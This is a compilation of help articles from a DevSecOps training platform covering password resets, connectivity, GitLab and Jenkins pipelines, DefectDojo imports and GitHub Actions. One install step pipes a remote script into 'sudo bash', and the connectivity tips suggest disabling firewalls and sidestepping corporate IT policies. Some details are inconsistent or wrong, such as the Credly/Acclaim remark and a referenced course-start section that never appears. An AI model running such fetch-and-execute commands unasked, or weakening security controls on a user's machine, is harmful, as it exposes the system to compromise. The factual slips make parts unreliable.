1. Exact error messages or screenshots 2. Network diagnostics (speed test results, ping output) 3. Actions already performed (VPN use, lab reset, device change) Our support engineers will prioritize your case and work with you to restore a seamless learning experience. Happy Learning! By systematically checking your network, device, and lab provisioning status, most video and performance issues can be resolved in minutes. Keep this guide handy, and you’ll spend less time troubleshooting and more time mastering DevSecOps skills. If you need further assistance, our support team is just a click away. 🚀

Last updated on Feb 09, 2026

Technical Help: Resetting Your Password, Fixing Connectivity Issues, and Resolving the “Test Stage Missing” Lab Error in the GitLab Safety Exercise

Technical Help: Resetting Your Password, Fixing Connectivity Issues, and Resolving the “Test Stage Missing” Lab Error in the GitLab Safety Exercise Introduction Whether you’re new to the Practical DevSecOps training platform or a seasoned learner, encountering roadblocks can be frustrating. This guide consolidates three of the most common support topics into a single, easy‑to‑follow article: 1. How to reset your portal password 2. Troubleshooting network‑related access problems 3. Resolving the “test stage seems to be missing” error in the How to Embed Safety into GitLab lab Follow the step‑by‑step instructions, practical examples, and troubleshooting tips below to get back on track quickly. 1. Resetting Your Portal Password Why a password reset might be needed - Forgotten or mistyped credentials - Security policy requiring periodic password changes - Account lockout after multiple failed login attempts Step‑by‑Step Reset Process 1. Open the password‑reset page. Here is the link below https://id.practical-devsecops.training/realms/public/account/ 2. Locate the “Change Password” section – it is usually positioned near the top of the page. 3. Enter your current password (if you remember it) and then type the new password twice. 4. Follow any password‑policy hints (e.g., minimum length, required symbols). 5. Click “Submit”. You should see a confirmation message indicating that the password was updated successfully. Tips for a Strong, Memorable Password - Use a passphrase: combine 3–4 unrelated words (e.g., BlueCactus!2025). - Include at least one uppercase letter, one number, and one special character. - Avoid personal information such as birthdays or names. If you do not receive a confirmation or encounter an error, clear your browser cache or try a different browser, then repeat the steps. 2. Troubleshooting Connectivity Issues Access problems can stem from many sources—your local environment, corporate security controls, or the training platform itself. Below is a systematic checklist to isolate and resolve the most common culprits. 2.1 Checklist for Immediate Fixes | # | Potential Issue | Quick Test / Fix | |---|-----------------|------------------| | 1 | Unstable internet connection | Run a speed test (e.g., speedtest.net). If latency > 150 ms or packet loss > 2 %, switch to a more stable network. | | 2 | VPN blocking the portal | Disable the VPN temporarily and try reloading the site. | | 3 | Firewall restrictions | Temporarily turn off the local firewall or add an exception for *.practical-devsecops.training. | | 4 | Corporate laptop policies | Use a personal laptop or a clean virtual machine that isn’t subject to strict IT policies. | | 5 | Browser extensions interfering | Disable ad‑blockers, privacy extensions, or security plugins, then reload. | | 6 | Cached data causing conflicts | Open an Incognito/Private window (Chrome → Ctrl+Shift+N, Firefox → Ctrl+Shift+P) and log in again. | | 7 | Mobile data as an alternative | Connect your device to a mobile hotspot and verify access. | 2.2 Detailed Troubleshooting Flow 1. Confirm the site is up – check https://status.practical-devsecops.training (if available) or use a service like DownDetector. 2. Ping the domain from a terminal: ping id.practical-devsecops.training If you receive timeouts, the issue is likely network‑level. 3. Trace the route to pinpoint where packets are dropped: traceroute id.practical-devsecops.training # macOS / Linux tracert id.practical-devsecops.training # Windows 4. Contact your IT department if the trace stops at a corporate gateway—request an exception for the training domain. 2.3 Pro Tips - Keep a dedicated browser profile for training (no extensions, default settings). - If you frequently switch between work and personal networks, consider using a portable browser on a USB stick. - Document any corporate proxy settings; you may need to add them to the browser’s proxy configuration. 3. Fixing the “Test Stage Seems to Be Missing” Error in the GitLab Safety Lab The How to Embed Safety into GitLab lab asks you to rename a job from test to oast. The error “test stage seems to be missing” appears when the stage name is inadvertently altered instead of the job name. 3.1 Understanding Jobs vs. Stages - Job – a single unit of work (e.g., oast). - Stage – a logical grouping of jobs (e.g., test). Both are defined in the .gitlab-ci.yml file, and the CI/CD runner expects the exact stage name that already exists. 3.2 Correct YAML Snippet oast: # <-- This is the **job** name you rename stage: test # <-- Keep the **stage** name unchanged script: - docker run --rm -v $(pwd):/src hysnsec/safety check -r requirements.txt --json > oast-results.json artifacts: paths: [oast-results.json] when: always allow_failure: true 3.3 Step‑by‑Step Fix 1. Open the .gitlab-ci.yml file in your preferred editor. 2. Locate the block that begins with test: (the original job name). 3. Change only the label before the colon from test: to oast:. Do not modify the line stage: test. 4. Save the file and commit the change: git add .gitlab-ci.yml git commit -m "Rename test job to oast for safety lab" git push origin <your‑branch> 5. Return to the lab UI and click Check. The challenge checker will now recognize the correctly named job. 3.4 Common Pitfalls | Symptom | Likely Cause | Remedy | |---------|--------------|--------| | “test stage seems to be missing” | Stage name edited (e.g., stage: oast) | Revert stage line to stage: test. | | Checker reports “case‑sensitive mismatch” | Job name capitalized incorrectly (Oast) | Use all‑lowercase oast. | | No output files in artifacts | Misspelled artifact path (oast‑results.json) | Ensure path matches exactly. | 3.5 Quick Validation Run a local pipeline simulation (if you have GitLab Runner installed) to verify syntax before committing: gitlab-runner exec docker .gitlab-ci.yml If the job executes without stage errors, the lab should pass. 4. Frequently Asked Questions & Quick Tips FAQ - Q: I reset my password but still can’t log in. A: Clear browser cookies for the domain, or try a different browser. - Q: My corporate firewall blocks the portal even after disabling VPN. A: Request an explicit whitelist for id.practical-devsecops.training from your IT security team. - Q: The GitLab lab still shows the error after I think I fixed it. A: Ensure you committed the change and pushed to the correct branch. The checker only evaluates the remote repository. Quick Tips - Bookmark the password‑reset URL for future reference. - Keep a network troubleshooting cheat sheet (ping, traceroute, incognito) handy. - Use Git diff (git diff HEAD~1) to verify only the intended lines changed in the .gitlab-ci.yml. Conclusion By following the structured procedures outlined above, you can quickly reset your portal password, overcome typical connectivity hurdles, and resolve the “test stage seems to be missing” error in the GitLab safety lab. Mastering these troubleshooting skills not only smooths your learning journey but also reinforces the DevSecOps mindset of proactive problem solving. If you encounter any other issues, please reach out to the Technical Support team via the learning platform’s help desk. Happy securing!

Last updated on Feb 06, 2026

Troubleshooting DefectDojo Upload Errors (400 Bad Request, 500 Internal Server Error, and TruffleHog Imports)

Troubleshooting DefectDojo Upload Errors (400 Bad Request, 500 Internal Server Error, and TruffleHog Imports) DefectDojo is a powerful open‑source platform for managing application security findings, but uploading scan results can sometimes trigger error messages that interrupt your workflow. This guide explains the most common upload failures—400 Bad Request, 500 Internal Server Error, and missing content when importing TruffleHog reports—why they happen, and step‑by‑step solutions to get your data into DefectDojo quickly and reliably. Table of Contents 1. Understanding the 400 Bad Request error 2. Resolving the 500 Internal Server Error 3. Why a TruffleHog upload shows only the file name 4. General troubleshooting checklist 5. Tips & Frequently Asked Questions 1. 400 Bad Request – What It Is and How to Fix It A 400 Bad Request response tells you that DefectDojo rejected the request because the client (you) supplied invalid data. In the context of uploads, the most common causes are: | Cause | Description | Example | |-------|-------------|---------| | Incorrect scanner name | Scanner identifiers are case‑sensitive and must match the exact name stored in DefectDojo. | Using --scanner "zap scan" instead of "ZAP Scan" | | Missing or wrong argument | A required CLI argument is omitted or contains a typo. | --scanner "SSLyze 3 Scan (JSON)" – the scanner does not exist in DefectDojo. | | Non‑existent engagement ID | The --engagement_id you reference does not correspond to any engagement in the system. | --engagement_id 3 when there is no engagement with ID 3. | How to Resolve a 400 Error 1. Verify the scanner name - Open DefectDojo → Configuration → Scanners. - Copy the scanner name exactly (including spaces and capitalization). - Use that string in your upload command. 2. Check required arguments - Run the upload script with the --help flag to see all mandatory parameters. - Ensure each argument is present and correctly spelled. 3. Confirm the engagement ID - Navigate to Engagements in the UI. - Locate the numeric ID (displayed in the URL, e.g., …/engagement/42/). - Use that ID in the --engagement_id flag. 4. Re‑run the command after correcting the values. - If the error persists, capture the full CLI output with --debug and compare it to the API payload shown in the DefectDojo logs (Admin → System Settings → Logging). 2. 500 Internal Server Error – What It Is and How to Fix It A 500 Internal Server Error indicates that DefectDojo received the request but failed while processing it. The most frequent trigger for upload‑related 500 errors is malformed or empty scan output files. Typical Scenarios | Situation | Why It Causes 500 | Remedy | |-----------|-------------------|--------| | Empty XML/JSON file (e.g., an empty zap-output.xml) | The parser expects at least one finding; an empty document raises an exception. | Regenerate the scan, ensuring that the tool actually discovers findings, or manually add a dummy entry for testing. | | Incorrect file format (e.g., uploading a plain‑text log to a parser that expects JSON) | The parser cannot deserialize the content. | Use the exact output format documented for the tool (see DefectDojo’s parser list). | | Corrupted file (truncated or non‑UTF‑8 encoding) | Parsing fails with a Unicode or XML error. | Re‑download the report, verify file integrity, and confirm UTF‑8 encoding (file -i report.xml). | Step‑by‑Step Fix 1. Open the report locally and confirm it contains data. cat zap-output.xml | head 2. Validate the file against its schema (if available). - For XML: xmllint --noout --schema zap_schema.xsd zap-output.xml - For JSON: python -m json.tool report.json 3. If the file is empty or malformed, re‑run the original scanner with appropriate options (e.g., -o zap-output.xml). 3. TruffleHog Upload Shows Only the File Name When importing a TruffleHog scan via CI/CD, you may see the file name appear in DefectDojo but no findings. This usually stems from using the wrong output format or from a parsing mismatch. Correct TruffleHog Output for DefectDojo DefectDojo expects JSON formatted results that match the parser documented here: https://defectdojo.github.io/django-DefectDojo/integrations/parsers/#trufflehog The CLI flag to produce JSON is: trufflehog git . --json > trufflehog-report.json Troubleshooting Steps 1. Download the generated report from the CI job artifact. 2. Open the file and verify it contains an array of JSON objects, each with path, commit, rule, reason, etc. 3. Test the import via the GUI: - In DefectDojo, go to Findings → Import Scan. - Choose TruffleHog as the scanner, upload the JSON file, and click Import. - If findings appear, the file format is correct; the issue lies in the CI upload script. 4. If the GUI import also shows only the file name, the report is likely not JSON (e.g., plain‑text). Regenerate using the --json flag. 5. Update your CI/CD step to reference the correct file path and format. Example for GitLab CI: trufflehog_scan: stage: test script: - trufflehog git . --json > trufflehog-report.json - | curl -X POST "$DEFECTDOJO_URL/api/v2/import-scan/" \ -H "Authorization: Token $DD_API_TOKEN" \ -F "file=@trufflehog-report.json" \ -F "scan_type=TruffleHog Scan" \ -F "engagement=42" 6. Run the pipeline again and verify that findings appear under the selected engagement. 4. General Troubleshooting Checklist | ✅ Checklist Item | Why It Matters | |-------------------|----------------| | Use --debug / -v flags on upload scripts | Shows the exact payload sent to the API, making it easier to spot missing fields. | | Confirm API endpoint (/api/v2/import-scan/) | A wrong endpoint returns 404 or 500. | | Validate authentication token | Expired or missing tokens cause 401/403, which can masquerade as 400 errors. | | Check DefectDojo version compatibility | Parsers evolve; an older Dojo instance may not support newer scanner output. | | Review server logs (docker logs dojo_web or /var/log/uwsgi/app.log) | Provides stack traces that pinpoint the exact parser failure. | | Restart the Dojo service after configuration changes | Some settings (e.g., new scanners) require a reload to take effect. | 5. Tips & Frequently Asked Questions Tips for Smooth Imports - Keep scanner names consistent: Store them in a small reference file (scanners.txt) and copy‑paste to avoid case errors. - Automate validation: Add a pre‑flight step in CI that runs python -m json.tool or xmllint on the report before uploading. - Leverage the GUI for first‑time imports: It quickly confirms that the report format is acceptable before you script the CI integration. Frequently Asked Questions | Question | Answer | |----------|--------| | Can I upload a zip file containing multiple reports? | Yes, but only if the zip contains files of a single supported format and you specify the correct scan_type. | | What if I get a 400 error even after correcting the scanner name? | Verify that the engagement ID exists and that you have permission to add findings to that engagement. | | Is there a way to see which parser raised a 500 error? | Enable detailed logging (LOGGING_LEVEL = "DEBUG" in settings.py). The server log will list the parser name before the traceback. | | Why does TruffleHog sometimes output “null” findings? | This occurs when the scan runs on a repository with no secrets. The file is still valid JSON but contains an empty array—DefectDojo will import zero findings, which appears as “only the file name”. | Bottom Line Understanding the root cause of DefectDojo upload errors—whether they stem from incorrect scanner arguments (400), malformed output files (500), or improper TruffleHog formatting—allows you to resolve issues quickly and keep your vulnerability management pipeline flowing. Use the systematic steps above, validate your reports locally, and leverage DefectDojo’s logs and GUI to pinpoint problems before they block your CI/CD processes. Happy scanning!

Last updated on Jan 06, 2026

Technical Support Guide: Lab Errors, Data Privacy, Certificate Validity & Support Channels for Practical DevSecOps Learners

Technical Support Guide: Lab Errors, Data Privacy, Certificate Validity & Support Channels for Practical DevSecOps Learners Introduction Whether you’re troubleshooting an InSpec profile, wondering how your passport data is protected, or need clarity on certificate lifetimes, this guide consolidates the most common support topics for Practical DevSecOps courses. By following the steps and best‑practice tips below, you can resolve lab issues quickly, stay compliant with privacy regulations, and understand the long‑term value of your certifications and support channels. 1. Resolving Lab Execution Issues 1.1 SSH Authentication Errors with the Linux Baseline InSpec Profile Typical scenario: You launch the Linux Baseline InSpec profile, but the run fails with an SSH authentication error, even after following the video walkthrough. Root causes to check: 1. Incorrect SSH credentials – Ensure the username, password, or private key matches the target VM. 2. Network restrictions – Verify that the lab VM allows inbound SSH (port 22) from your IP address. 3. Host key verification – If the VM’s host key changed, the SSH client may reject the connection. Quick fix: - Open a terminal and manually ssh into the VM using the same credentials. If you can connect, re‑run the InSpec profile. - If the manual test fails, regenerate the SSH key pair in the lab environment and update the InSpec ssh_key attribute. 1.2 Switching to Cinc Auditor (formerly Chef InSpec) If you continue to encounter authentication problems, you may use Cinc Auditor for the Configuration as Code (CaC) job instead of the native InSpec runner. How to switch: 1. Install Cinc Auditor (if not already installed): curl -L https://omnitruck.cinc.sh/install.sh | sudo bash -s -- -P auditor 2. Run the same profile with Auditor: cinc-auditor exec path/to/linux-baseline-profile 3. Provide the same SSH options (--target ssh://user@host) as you would with InSpec. Cinc Auditor uses the same profile syntax, so no changes to the profile files are required. This alternative often bypasses environment‑specific bugs that affect the InSpec binary. 2. Passport & Verification Document Handling 2.1 What Happens to Your Passport Data? - No third‑party sharing: Your passport scan or any verification document is never shared outside Practical DevSecOps. - Immediate deletion: In compliance with SOC 2, ISO 27001, and GDPR, the document is deleted right after verification. You can review the full privacy policy here: https://trust.practical-devsecops.com. 2.2 Retention Period - Zero‑retention model: Once the identity check is successful, the file is purged from our systems. No backup copies are retained. 3. Certificate Validity & Renewal 3.1 Do DevSecOps Certificates Expire? Answer: No. All Practical DevSecOps certificates are lifetime credentials. There is no renewal fee or periodic re‑certification requirement. 3.2 When Might You Need an Updated Credential? - New version releases: If a major course version is launched (e.g., “DevSecOps Engineer v2”), you may choose to earn the updated badge for market relevance. - Employer requirements: Some organizations request a recent assessment; in that case, you can retake the exam for a fresh certification date. 4. Dedicated Support Channels 4.1 How Long Is a Dedicated Channel Active? - The channel remains open as long as you interact at least once every 90 days. - If there is no activity for more than three months, the channel is automatically archived. 4.2 Reactivating an Archived Channel 1. Open a new ticket via the Support Portal. 2. Reference the archived channel ID. 3. Our support team will restore the channel within 24 hours. 5. Getting Help with Lab Issues 5.1 Using the “Chat with support” Feature All labs include a built‑in Chat with support button. When you click it: - System logs (including console output) are attached automatically. Best practice: Add a brief description of what you were trying to accomplish before the error occurred. This context speeds up resolution. 5.2 Example Support Request “I’m trying to run the Linux Baseline InSpec profile on the Ubuntu VM (IP 192.168.1.10). The run fails with ‘SSH authentication failed – permission denied (publickey)’. I have verified that the private key is uploaded to the lab’s ~/.ssh folder.” Providing the IP address, error message, and verification steps helps the support team diagnose the issue within minutes. 6. Frequently Asked Questions (FAQs) | Question | Quick Answer | |----------|--------------| | Can I replace InSpec with Cinc Auditor for any lab? | Yes, for all CaC jobs. The profile syntax is identical. | | Is my passport data ever stored after verification? | No. It is deleted immediately per SOC 2/ISO 27001/GDPR. | | Do I need to renew my certificate after a year? | No. Certificates are lifetime; only optional re‑certifications apply. | | What triggers channel archiving? | Inactivity longer than 90 days. | | What information is sent when I use “Chat with support”? | Screenshot, console logs, and your typed message. No personal data is transmitted unless you include it. | 7. Tips for Smooth Lab Experiences - Pre‑flight checklist before running any profile: verify SSH credentials, confirm network connectivity, and ensure the correct version of the tool (InSpec or Cinc Auditor) is installed. - Bookmark the privacy policy page for quick reference on data handling. - Set a calendar reminder to interact with your dedicated channel at least once every two months to avoid auto‑archiving. - Take screenshots of error messages before contacting support; the built‑in chat already captures them, but having a local copy can be handy for follow‑up documentation. Conclusion Technical hurdles, data‑privacy concerns, and support logistics can feel overwhelming, but Practical DevSecOps provides clear pathways to resolve each. By leveraging Cinc Auditor as an alternative to InSpec, understanding our strict passport‑data deletion policy, recognizing the lifetime value of your certificates, and using the built‑in chat support effectively, you’ll stay focused on mastering DevSecOps skills rather than troubleshooting roadblocks. If you encounter any other issues not covered here, don’t hesitate to reach out through the Chat with support button and request a real agent to help you. Happy learning!

Last updated on Mar 13, 2026

Account Support & Credentialing for DevSecOps Learners

Account Support & Credentialing for DevSecOps Learners Quickly get the help you need—whether you’re checking staff availability, figuring out course start deadlines, or locating your Credly badge. This guide consolidates the most common support scenarios and provides step‑by‑step instructions so you can stay focused on mastering DevSecOps concepts. Introduction Enrolled in a DevSecOps certification program? You’re not alone. Learners often have questions about account support, course timelines, and credentialing. This article walks you through three frequent issues: 1. Identifying which staff members are currently online. 2. Understanding the time window for starting a new course. 3. Retrieving a missing Credly badge. By following the procedures below, you’ll resolve these concerns efficiently and keep your learning journey on track. 1. How to Find Online Staff Members When you need immediate assistance—perhaps for a lab environment or a content clarification—knowing who’s available can save valuable time. Steps to Locate Online Staff 1. Open the communication via Mattermost channel. 2. Check the presence indicators next to each staff member’s name. Most tools display a green dot for “online,” a yellow dot for “away,” and a gray dot for “offline.” Example Scenario You’re stuck on a Kubernetes hardening lab and need clarification on a security policy. - You open the #ccnse Mattermost channel. - No staff member has replied within 5 minutes. - You type @here I’m having trouble with the pod security policy. Can anyone help? - Within a couple of minutes, a lab instructor replies with the needed guidance. Tip: Avoid over‑pinging. Use @here only when the issue is time‑sensitive and you’ve already waited a reasonable period (e.g., 5‑10 minutes). 2. Missing Your Credly Badge Credly (now part of Acclaim) issues digital badges that verify your DevSecOps achievement. If the badge email never appears, follow these steps. Step‑by‑Step Checklist 1. Search your email folders - Look in Inbox, Spam, Junk, and Promotions for a message from no-reply@credly.com or badge@acclaim.com. 2. Verify your email address - Ensure the address on your learner profile matches the one you’re checking. Update it in the platform settings if needed. 3. Resend the badge - Log into the DevSecOps learning portal, navigate to My Credentials, and click Resend Badge. 4. Check Credly account - If you have an existing Credly account, log in at credly.com and look under My Badges. The badge may already be attached. 5. Contact support - If the badge is still missing, open a request to real agent to help you with the following details: - Full name and learner ID - Course name and completion date - Email address used for enrollment Tip: Include a screenshot of your My Credentials page to speed up verification. Common Questions & Quick Tips | Question | Quick Answer | |----------|--------------| | What if I’m offline when staff is online? | Staff members will see your message and reply when they return. Use @here only when you need an immediate response. | | Do I need a Credly account to receive the badge? | No. Credly will create a temporary link for first‑time recipients, but creating an account lets you manage and share the badge later. | | How long does it take for support to respond? | Typical response time is within 24 hours on business days. Critical lab issues are prioritized. | Final Thoughts Navigating account support and credentialing doesn’t have to be a hurdle. By checking staff availability with @here, respecting the one‑year course start window, and following the badge‑retrieval checklist, you’ll keep your DevSecOps learning experience smooth and rewarding. If you encounter any other issues, remember that the Technical Support team is just a message away—ready to help you succeed in your certification journey. Happy learning

Last updated on Feb 09, 2026

SCA Output Formats, Filtering High‑Severity Issues, and Retrieving DefectDojo IDs

SCA Output Formats, Filtering High‑Severity Issues, and Retrieving DefectDojo IDs Learn how to save SCA results as JSON, filter high‑severity findings in RetireJS, and locate key identifiers (project, engagement, and lead IDs) in the DefectDojo portal. Introduction Software Component Analysis (SCA) tools such as and RetireJS are essential for identifying vulnerable open‑source libraries in modern applications. While these tools generate rich JSON reports, learners often wonder how to: 1. Persist the JSON output to a file. 2. Isolate high‑severity findings from a RetireJS report. 3. Locate the project, engagement, and lead identifiers required for DefectDojo API calls or manual uploads. This article walks you through each of these tasks step‑by‑step, providing command‑line examples, JSON‑query snippets, and navigation tips for the DefectDojo web UI. By the end of the guide you’ll be able to automate report handling, focus on the most critical vulnerabilities, and correctly reference DefectDojo IDs in your DevSecOps pipelines. 1. Identifying High‑Severity Issues in RetireJS Output RetireJS produces a JSON structure where each component may contain multiple vulnerabilities, each with a severity field (low, medium, high). Filtering can be done with jq, a lightweight and powerful JSON processor. 1.1 Example RetireJS JSON (Simplified) { "data": [ { "results": [ { "component": "jquery", "version": "3.3.1", "vulnerabilities": [ { "severity": "high", "info": "CVE‑2020‑11022" }, { "severity": "low", "info": "CVE‑2019‑5436" } ] } ] } ] } 1.2 Command to List High‑Severity Findings cat retire_output.json | jq -r ' .data[].results[] | select(.vulnerabilities[].severity == "high") | "\(.component) \(.version) – \(.vulnerabilities[] | select(.severity=="high") | .info)" ' Explanation - -r outputs raw strings (no quotes). - The select filter keeps only results where any vulnerability has severity == "high". - The final string concatenates the component name, version, and CVE identifier. 1.3 Command to List Low‑Severity Findings (For Comparison) cat retire_output.json | jq -r ' .data[].results[] | select(.vulnerabilities[].severity == "low") | "\(.component) \(.version) – \(.vulnerabilities[] | select(.severity=="low") | .info)" ' You can replace "low" with "medium" or "high" to target a different severity level. 1.4 Saving the Filtered Results # Save high‑severity list to a file cat retire_output.json | jq -r '...' > high_severity_issues.txt 2. Finding Project, Engagement, and Lead IDs in DefectDojo DefectDojo uses numeric IDs to uniquely identify Products (projects), Engagements, and Leads (users). These IDs are required when you import scan results via the API or when you need to reference a specific engagement in lab instructions. 2.1 Navigating the UI 1. Log in to the DefectDojo portal. 2. From the left navigation pane, select Products → View Products. 3. Click the product you are working with. The Product ID appears in the browser’s address bar, e.g.: https://defectdojo.example.com/product/42/ Here, 42 is the product (project) ID. 4. Inside the product view, click Engagements → View Engagements. 5. Choose the desired engagement. Its URL will look like: https://defectdojo.example.com/engagement/108/ 108 is the engagement ID. 6. To locate the lead (user) ID, open People → Users and click the user’s name. The URL will contain /user/<id>/. https://defectdojo.example.com/user/7/ 7 is the lead’s ID. 2.2 Using the IDs in API Calls curl -X POST "https://defectdojo.example.com/api/v2/import-scan/" \ -H "Authorization: Token <YOUR_API_TOKEN>" \ -F "engagement=108" \ -F "lead=7" \ -F "file=@retire_report.json" Replace the numeric values with the IDs you retrieved from the UI. 2.3 Common Pitfall: “Issues Not Marked as False Positive” If you modify a JSON report (e.g., delete three issues) and re‑upload it, DefectDojo may still show the original findings because: - The original findings are stored as separate objects; deleting them from the uploaded file does not automatically mark them as false positives. - You must either re‑import with the scan_type set to reimport (which overwrites existing findings) or manually mark the unwanted findings as False Positive in the UI. Quick fix: curl -X POST "https://defectdojo.example.com/api/v2/import-scan/" \ -H "Authorization: Token <TOKEN>" \ -F "engagement=108" \ -F "lead=7" \ -F "file=@modified_report.json" \ -F "scan_type=Reimport Scan" Common Questions & Tips | Question | Quick Answer | |----------|--------------| | How do I filter both high and medium severity at once? | Use a regex or multiple conditions: select(.vulnerabilities[].severity | test("high|medium")). | | Where do I find the API token for DefectDojo? | In the UI: User → API Tokens → Generate New Token. Store it securely. | | What if the URL does not show an ID? | Ensure you are on the detail page (e.g., “View Engagement”) rather than a list view. | | Is there a way to automate ID retrieval? | Yes – use DefectDojo’s REST API: GET /api/v2/products/ returns product IDs in JSON. | Conclusion By mastering simple shell redirection, jq filtering, and DefectDojo navigation, you can streamline the entire SCA reporting workflow: - Extract high‑severity vulnerabilities from RetireJS output for focused remediation. - Identify the exact project, engagement, and lead IDs required for DefectDojo imports and API interactions. These skills not only help you complete lab assignments efficiently but also lay the groundwork for automating SCA processes in real‑world DevSecOps pipelines. Happy scanning!

Last updated on Jan 07, 2026

Advanced Jenkins Tagging, Enterprise‑Grade Pipelines, and Failure Handling in GitHub Actions

Advanced Jenkins Tagging, Enterprise‑Grade Pipelines, and Failure Handling in GitHub Actions Learn how to pass Git tags into Jenkins pipelines, design a production‑ready DevSecOps pipeline in Jenkins, and gracefully handle failures in GitHub Actions. Introduction In modern CI/CD workflows, metadata such as Git tags often drives release decisions, while security testing (SCA, SAST, DAST) must be baked into the pipeline to meet compliance requirements. At the same time, teams need the ability to continue a workflow even when a step fails—especially in security scanning where you want reports even on failure. This article walks you through: 1. Ensuring tag information is available inside a Jenkins pipeline (Challenge 2). 2. Building an “enterprise‑grade” Jenkins pipeline that stitches together SCA, SAST, and DAST stages. 3. Using continue-on-error and conditional expressions to allow failures in GitHub Actions. All examples are ready to copy‑paste into your own projects. 1. Passing Git Tag Information to a Jenkins Pipeline Why It Matters Tags mark release points, hot‑fixes, or any versioned artifact. When a pipeline runs on a tagged commit you often need that tag value to: - Publish a Docker image with the correct version tag. - Trigger downstream jobs that depend on the release identifier. - Store the tag in a vulnerability management platform (e.g., DefectDojo). Prerequisites | Requirement | How to Set Up | |-------------|---------------| | Multibranch Pipeline in Jenkins | Create a Multibranch Pipeline job → Point it at your GitLab repository. Jenkins will automatically discover branches and tags. | | GitLab tags | In GitLab, create a tag on the commit you want to build: git tag -a v1.2.3 -m "Release 1.2.3" → git push origin v1.2.3. | | Jenkinsfile that reads the tag | Use the built‑in env.GIT_TAG (or env.TAG_NAME depending on your Jenkins version). | Step‑by‑Step Guide 1. Enable tag detection multibranchPipelineJob('my‑project') { branchSources { git { id('gitlab') remote('https://gitlab.com/your‑repo.git') credentialsId('gitlab‑creds') includes('*/') // branches includes('*') // tags (wildcard) } } } 2. Read the tag inside Jenkinsfile pipeline { agent any environment { // When the build is triggered by a tag, GIT_TAG is populated. RELEASE_TAG = "${env.GIT_TAG ?: 'no-tag'}" } stages { stage('Show Tag') { steps { echo "Running for tag: ${env.RELEASE_TAG}" } } // Example: use the tag to tag a Docker image stage('Build & Push Docker') { when { expression { return env.RELEASE_TAG != 'no-tag' } } steps { sh """ docker build -t myapp:${RELEASE_TAG} . docker push myapp:${RELEASE_TAG} """ } } } } 3. Optional: Send the tag to DefectDojo stage('Report to DefectDojo') { steps { sh """ curl -X POST https://defectdojo/api/v2/findings/ \ -H "Authorization: Token ${DOJO_TOKEN}" \ -d "title=Release ${RELEASE_TAG}" \ -d "tags=${RELEASE_TAG}" """ } } Helpful References - Jenkins blog: [Pipelines with Git tags] (May 2018) – https://www.jenkins.io/blog/2018/05/16/pipelines-with-git-tags/ - Video walkthrough (starting at 1:06): https://youtu.be/HgiI-8VrxQE?t=66 If you need a visual guide, request the “CD Jenkins Part 2” support video from the staff. 2. Designing an Enterprise‑Grade DevSecOps Pipeline in Jenkins What “Enterprise‑Grade” Means - End‑to‑end security coverage: combines Software Composition Analysis (SCA), Static Application Security Testing (SAST), and Dynamic Application Security Testing (DAST). - Reusable, modular stages that can be dropped into any project. - Integration with a central reporting hub (e.g., DefectDojo) for compliance dashboards. - Scalable – runs in parallel where possible, uses Docker containers for isolation. Sample Jenkinsfile pipeline { agent any options { timeout(time: 60, unit: 'MINUTES') timestamps() } environment { DOJO_URL = 'https://defectdojo.example.com' DOJO_TOKEN = credentials('defectdojo-token') } stages { stage('Checkout') { steps { checkout scm } } // ---------- SCA ---------- stage('Software Composition Analysis') { parallel { stage('Dependency‑Check') { agent { docker 'owasp/dependency-check' } steps { sh 'dependency-check.sh --project "$JOB_NAME" -f JSON -o reports/sca' archiveArtifacts artifacts: 'reports/sca/**', fingerprint: true } } stage('Syft SBOM') { agent { docker 'anchore/syft' } steps { sh 'syft . -o json > reports/sca/syft.json' archiveArtifacts artifacts: 'reports/sca/syft.json', fingerprint: true } } } } // ---------- SAST ---------- stage('Static Application Security Testing') { parallel { stage('Bandit (Python)') { agent { docker 'hysnsec/bandit' } steps { sh 'bandit -r . -f json -o reports/sast/bandit.json || true' archiveArtifacts artifacts: 'reports/sast/bandit.json', fingerprint: true } } stage('SpotBugs (Java)') { agent { docker 'spotbugs/spotbugs' } steps { sh 'spotbugs -textui -output reports/sast/spotbugs.xml . || true' archiveArtifacts artifacts: 'reports/sast/spotbugs.xml', fingerprint: true } } } } // ---------- DAST ---------- stage('Dynamic Application Security Testing') { agent { docker 'owasp/zap2docker-stable' } steps { sh ''' zap-baseline.py -t http://my‑app:8080 -r reports/dast/zap-report.html || true ''' archiveArtifacts artifacts: 'reports/dast/**', fingerprint: true } } // ---------- Reporting ---------- stage('Upload to DefectDojo') { steps { sh ''' python upload_to_dojo.py \ --url $DOJO_URL \ --token $DOJO_TOKEN \ --engagement "CI/CD $BUILD_NUMBER" \ --scan-type "Jenkins" \ --file reports/**/*.json \ --file reports/**/*.xml \ --file reports/**/*.html ''' } } } post { always { cleanWs() } } } Key Points - Parallel execution reduces total run time. - Each security tool runs inside a Docker container, ensuring consistent environments. - The || true pattern prevents a failing security scan from aborting the pipeline; results are still uploaded for visibility. - All artifacts are archived for later audit. How to Adapt the Template 1. Swap tools – replace Bandit with Trivy for container scanning, or add a license‑compliance scanner. 2. Add environment variables for credentials (use Jenkins Credentials Binding). 3. Customize reporting – map the upload_to_dojo.py script to your own API client if you use a different platform. 3. Allowing Failures in GitHub Actions Sometimes a security scan should never block the pipeline, but you still want the report. GitHub Actions provides two mechanisms: | Mechanism | Scope | Effect | |-----------|-------|--------| | continue-on-error: true | Job or individual step | Marks the job/step as successful even if it exits with a non‑zero code. | | if: always() | Step | Guarantees the step runs regardless of previous failures (useful for uploading artifacts). | Example 1 – Whole Job Continues on Error name: CI‑Security on: [push, pull_request] jobs: sast: runs-on: ubuntu-20.04 continue-on-error: true # <‑‑ Job never fails steps: - uses: actions/checkout@v2 - name: Run Bandit run: | docker run --rm -v "$(pwd)":/src hysnsec/bandit \ -r /src -f json -o /src/bandit-output.json # Upload the report even if Bandit fails - name: Upload Bandit Report if: always() uses: actions/upload-artifact@v2 with: name: Bandit path: bandit-output.json Example 2 – Only a Specific Step Continues jobs: sast: runs-on: ubuntu-20.04 steps: - uses: actions/checkout@v2 - name: Run Bandit (may fail) id: bandit run: | docker run --rm -v "$(pwd)":/src hysnsec/bandit \ -r /src -f json -o /src/bandit-output.json continue-on-error: true # <‑‑ Step marked as success - name: Upload Bandit Report if: always() # Runs no matter what happened before uses: actions/upload-artifact@v2 with: name: Bandit path: bandit-output.json Best Practices - Prefer continue-on-error at the step level when only a single tool should be “non‑blocking”. - Use if: always() on artifact‑upload steps to guarantee results are stored. - Add a comment or badge in the workflow file to remind reviewers that a step is intentionally non‑fatal. Common Questions & Tips | Question | Answer | |----------|--------| | How do I make Jenkins treat a tag as a branch? | In a Multibranch Pipeline, enable “Discover tags” under Branch Sources → 